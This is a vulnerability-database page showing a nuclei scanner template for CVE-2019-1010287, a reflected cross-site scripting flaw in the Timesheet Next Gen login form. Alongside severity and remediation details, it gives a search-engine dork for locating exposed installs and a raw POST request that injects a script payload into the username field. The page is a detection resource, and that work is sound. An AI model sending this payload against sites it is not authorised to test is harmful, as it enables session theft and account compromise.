Lucene search
K

Timesheet Next Gen <=1.5.3 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 22 Views

Timesheet Next Gen 1.5.3 XSS vulnerability allows injection of arbitrary HTML/JavaScript code via the "redirect" parameter in login.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2019-1010287
17 Jul 201920:02
cve
Cvelist
CVE-2019-1010287
17 Jul 201920:02
cvelist
NVD
CVE-2019-1010287
17 Jul 201921:15
nvd
OSV
CVE-2019-1010287
17 Jul 201921:15
osv
Prion
Cross site scripting
17 Jul 201921:15
prion
Positive Technologies
PT-2019-11542 · Timesheet · Timesheet Next Gen
17 Jul 201900:00
ptsecurity
RedhatCVE
CVE-2019-1010287
22 May 202510:10
redhatcve
id: CVE-2019-1010287

info:
  name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.'
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks.
  reference:
    - http://www.mdh-tz.info/
    - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/
    - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-1010287
    cwe-id: CWE-79
    epss-score: 0.043
    epss-percentile: 0.89914
    cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: timesheet_next_gen_project
    product: timesheet_next_gen
    google-query: inurl:"/timesheet/login.php"
  tags: cve,cve2019,timesheet,xss,timesheet_next_gen_project,vuln

http:
  - raw:
      - |
        POST /timesheet/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '><script>javascript:alert(document.domain)</script>'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b7852967a056aa50dc294c460cc332e375d65e862da0d7a128bf94c47300a598022061fd805f6e4d91d7ef58d574546453aeb17206391b3c1389fee55f7615c41d45:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 36.1
EPSS0.043
22